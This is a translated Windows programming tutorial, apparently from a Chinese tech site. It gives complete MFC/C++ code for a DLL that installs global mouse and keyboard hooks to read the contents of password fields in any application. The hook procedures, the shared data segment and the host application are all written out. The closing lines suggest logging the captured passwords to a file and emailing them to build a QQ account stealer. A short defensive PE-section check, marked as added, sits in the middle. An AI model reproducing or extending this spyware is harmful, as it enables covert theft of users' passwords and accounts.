Use mouse and keyboard hooks to intercept passwords

Source: Internet
Author: User

Hooks can intercept and process messages that the system sends to other applications, which lets them do things ordinary programs cannot. It is worth mastering hook programming.

Hook category:
1. WH_CALLWNDPROC and WH_CALLWNDPROCRET: let you monitor messages sent to a window procedure.
3. WH_DEBUG: debugging hook
4. WH_FOREGROUNDIDLE: called by the system when the application's foreground thread becomes idle.
5. WH_JOURNALRECORD: monitors and records input events
6. WH_JOURNALPLAYBACK: plays back the events recorded by WH_JOURNALRECORD
7. WH_KEYBOARD: keyboard hook
9. WH_KEYBOARD_LL: low-level keyboard hook
10. WH_MOUSE: mouse hook
11. WH_MOUSE_LL: low-level mouse hook
12. WH_SHELL: shell hook
13. WH_MSGFILTER and WH_SYSMSGFILTER: let you monitor messages for menus, scroll bars, and message boxes.

Installing a hook:
Call the SetWindowsHookEx function to install the hook. Its function prototype is:
    HHOOK SetWindowsHookEx(int idHook, HOOKPROC lpfn, HINSTANCE hMod, DWORD dwThreadId);
idHook is the hook type, which corresponds one-to-one with the type of hook function, for example WH_KEYBOARD and WH_MOUSE.
lpfn is the address of the hook function.
hMod is the handle of the instance that contains the hook function. For a thread hook, this parameter is NULL. For a system hook, it is the handle of the DLL that contains the hook function. (A system hook must live in a DLL.)
dwThreadId specifies the ID of the thread the hook monitors. For global hooks, this parameter is NULL (0).
SetWindowsHookEx returns the handle of the installed hook.

Uninstalling a hook:
Call BOOL UnhookWindowsHookEx(HHOOK hhk) to uninstall the hook.

Defining the hook function:
A hook function is a special callback function. When an event monitored by the hook occurs, the system calls the hook function to process it. Its general form is:
    LRESULT WINAPI MyHookProc(int nCode, WPARAM wParam, LPARAM lParam)
The wParam and lParam parameters carry the information of the hooked message, such as the mouse position and state or the key pressed. nCode carries information about the message itself, such as whether it was removed from the message queue.

Example:
Next we install a mouse hook and a keyboard hook that intercept an entered password, using a "view the * password" program as the example of how hooks are used.

1. In the wizard, create an MFC AppWizard (dll) project named getpass and select "MFC Extension DLL".
2. Create a CGetPassHook class with base class CObject, and add the StartHook and StopHook functions as follows:
    class AFX_EXT_CLASS CGetPassHook : public CObject
    {
    public:
        BOOL StopHook();
        BOOL StartHook(HWND hwnd);

        CGetPassHook();
        virtual ~CGetPassHook();
    };
3: Add the global shared data as follows:
    #pragma data_seg("mydata")
    HHOOK hKeyboardHook = NULL;      // keyboard hook
    HHOOK hMouseHook = NULL;         // mouse hook
    HINSTANCE glhInstance = NULL;    // global instance handle
    HWND hOutputWnd = NULL;          // window that displays the password
    #pragma data_seg()

4: Add the mouse and keyboard hook procedures as follows:
    LRESULT WINAPI MouseHookProc(int nCode, WPARAM wParam, LPARAM lParam)
    {   // mouse hook procedure
        LPMOUSEHOOKSTRUCT lpMouse = (MOUSEHOOKSTRUCT FAR *)lParam;
        if (nCode >= 0)
        {
            HWND hTargetHwnd = lpMouse->hwnd;   // handle of the window under the mouse
            if (hTargetHwnd)
            {
                LONG style = ::GetWindowLong(hTargetHwnd, GWL_STYLE);   // get its style
                if (style & ES_PASSWORD)   // it is a password box
                {
                    char szPass[255];
                    ::SendMessage(hTargetHwnd, WM_GETTEXT, 255, (LPARAM)szPass);
                    // get the password
                    ::SendMessage(hOutputWnd, WM_SETTEXT, 0, (LPARAM)szPass);
                    // display the password
                }
            }
        }

        return CallNextHookEx(hMouseHook, nCode, wParam, lParam);
        // This call passes the message on down the hook chain. Without it the message is cancelled,
        // which can be used to intercept a message. We call it here.
    }

    LRESULT WINAPI KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
    {   // keyboard hook procedure

        if (nCode >= 0)
        {
            HWND hTargetHwnd = GetActiveWindow();   // get the active window
            if (hTargetHwnd)
                EnumChildWindows(hTargetHwnd, EnumWndProc, 0);   // enumerate all child windows
        }

        return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
        // This call passes the message on down the hook chain. Without it the message is cancelled,
        // which can be used to intercept a message. We call it here.
    }

The code above uses the EnumChildWindows function. Its prototype is as follows:
    BOOL EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam);
hWndParent: handle of the window whose child windows are enumerated
lpEnumFunc: address of the enumeration function
lParam: 0

 

5: Add the window enumeration function, shown below. (Note that the previous function uses this one, so it must be declared or defined before it.)

    BOOL WINAPI EnumWndProc(HWND hwnd, LPARAM lParam)
    {   // enumerate the child windows, looking for a password edit
        if (hwnd)
        {
            LONG style = ::GetWindowLong(hwnd, GWL_STYLE);   // get the style
            if (style & ES_PASSWORD)   // password box
            {
                char szPass[255];
                ::SendMessage(hwnd, WM_GETTEXT, 255, (LPARAM)szPass);        // get the password
                ::SendMessage(hOutputWnd, WM_SETTEXT, 0, (LPARAM)szPass);    // display it
                return TRUE;
            }
        }

        return TRUE;
    }

6: Define the segment attributes in the .def file (this step is important):
    SECTIONS
        mydata READ WRITE SHARED

7. Complete the StartHook and StopHook functions, which install and remove the hooks, as follows:
    BOOL CGetPassHook::StartHook(HWND hwnd)
    {   // install the hooks
        hMouseHook = SetWindowsHookEx(WH_MOUSE, MouseHookProc, glhInstance, 0);
        // mouse hook
        hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, glhInstance, 0);
        // keyboard hook
        if (hMouseHook && hKeyboardHook)
        {
            hOutputWnd = hwnd;   // handle of the window that displays the password
            return TRUE;
        }
        return FALSE;
    }

    BOOL CGetPassHook::StopHook()
    {   // uninstall the hooks
        BOOL mHook = UnhookWindowsHookEx(hMouseHook);
        BOOL kHook = UnhookWindowsHookEx(hKeyboardHook);
        if (mHook && kHook)
            return TRUE;
        return FALSE;
    }

8: Obtain the DLL handle in the DllMain function and store it in the glhInstance variable. To do so, add the following statements:
    extern HINSTANCE glhInstance;   // remember this declaration
    extern "C" int APIENTRY
    DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
    {
        UNREFERENCED_PARAMETER(lpReserved);
        if (dwReason == DLL_PROCESS_ATTACH)
        {
            TRACE0("getpass.dll Initializing!\n");

            if (!AfxInitExtensionModule(GetpassDLL, hInstance))
                return 0;
            new CDynLinkLibrary(GetpassDLL);
            glhInstance = hInstance;   // save the DLL handle
        }
        else if (dwReason == DLL_PROCESS_DETACH)
        {
            TRACE0("getpass.dll Terminating!\n");
            AfxTermExtensionModule(GetpassDLL);
        }
        return 1;   // OK
    }

9: Compile. This completes the DLL part.
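
A defender's triage check for the shared data segment declared in steps 3 and 6, as an added example that is not part of the original article: it lists the PE sections of an image that are both writable and shared across processes. The function names and the header-only sample image are constructed for illustration; legitimate DLLs also use shared sections, so a hit is a prompt for review rather than a verdict.

```cpp
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>
constexpr uint32_t kScnMemShared = 0x10000000;  // IMAGE_SCN_MEM_SHARED
constexpr uint32_t kScnMemWrite  = 0x80000000;  // IMAGE_SCN_MEM_WRITE

// Little-endian read of n bytes; the caller has already bounds-checked off.
static uint32_t rd(const std::vector<uint8_t>& b, size_t off, int n) {
    uint32_t v = 0;
    for (int i = 0; i < n; ++i) v |= uint32_t(b[off + i]) << (8 * i);
    return v;
}

// Names of sections that are mapped writable AND shared between processes.
std::vector<std::string> sharedWritableSections(const std::vector<uint8_t>& img) {
    std::vector<std::string> hits;
    if (img.size() < 0x40 || img[0] != 'M' || img[1] != 'Z') return hits;
    size_t pe = rd(img, 0x3C, 4);                       // e_lfanew
    if (pe > img.size() || img.size() - pe < 24 ||
        std::memcmp(&img[pe], "PE\0\0", 4) != 0) return hits;
    size_t count = rd(img, pe + 6, 2);                  // NumberOfSections
    size_t table = pe + 24 + rd(img, pe + 20, 2);       // skip the optional header
    for (size_t i = 0; i < count; ++i) {
        size_t s = table + i * 40;                      // IMAGE_SECTION_HEADER is 40 bytes
        if (s + 40 > img.size()) break;                 // truncated section table
        uint32_t ch = rd(img, s + 36, 4);               // Characteristics
        if ((ch & kScnMemShared) && (ch & kScnMemWrite)) {
            char name[9] = {0};
            std::memcpy(name, &img[s], 8);              // names are at most 8 bytes
            hits.emplace_back(name);
        }
    }
    return hits;
}

// Constructed sample: header-only image with .text and a shared "mydata" section.
std::vector<uint8_t> sampleImage() {
    std::vector<uint8_t> b(0x40 + 24 + 2 * 40, 0);
    b[0] = 'M'; b[1] = 'Z'; b[0x3C] = 0x40;
    std::memcpy(&b[0x40], "PE\0\0", 4);
    b[0x46] = 2;                                        // two sections, no optional header
    auto put = [&](size_t s, const char* n, uint32_t ch) {
        std::memcpy(&b[s], n, std::strlen(n));
        for (int i = 0; i < 4; ++i) b[s + 36 + i] = uint8_t(ch >> (8 * i));
    };
    put(0x58, ".text", 0x60000020);                     // code, execute, read
    put(0x80, "mydata", 0xD0000040);                    // data, read, write, shared
    return b;
}
```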

The following section describes how to create the application:

1: Create an MFC AppWizard (exe) project named GetPassword. In step 1, select "Add to current workspace" to add it to the current workspace, which is convenient.

2: Copy getpass.lib and GetPassHook.h from the DLL project to the directory where the app is located, then choose Project -> Add to Project -> Files and select the two files.

2: In the main dialog box, add an edit control with the ID IDC_EDIT_PASS.

3: Include the GetPassHook.h file in GetPasswordDlg.h and declare an object, as follows:

    #include "GetPassHook.h"
    class CGetPasswordDlg : public CDialog
    {
    protected:
        CGetPassHook m_hook;
        ...
        DECLARE_MESSAGE_MAP()
    };

4: Start the hook in OnInitDialog() in the implementation file:

    BOOL CGetPasswordDlg::OnInitDialog()
    {
        CWnd *pWnd = GetDlgItem(IDC_EDIT_PASS);
        m_hook.StartHook(pWnd->GetSafeHwnd());   // install the hooks

        return TRUE;   // return TRUE unless you set the focus to a control
    }

5: Add a handler for the WM_DESTROY message and stop the hook when the program exits, as shown below:
    void CGetPasswordDlg::OnDestroy()
    {
        CDialog::OnDestroy();
        m_hook.StopHook();   // stop the hooks
    }

6: Copy getpass.dll to the directory that contains the .exe.

7: Compile and run.
In this way, when a password is entered in any password box, it is intercepted. Even if the keyboard hook fails, moving the mouse over the password box still retrieves the * password, because two hooks are installed. Start QQ, enter the password, and see whether it has been intercepted. Make a slight modification to the program, output the intercepted password to a file, and add an email-sending capability, and a QQ hacker is created.
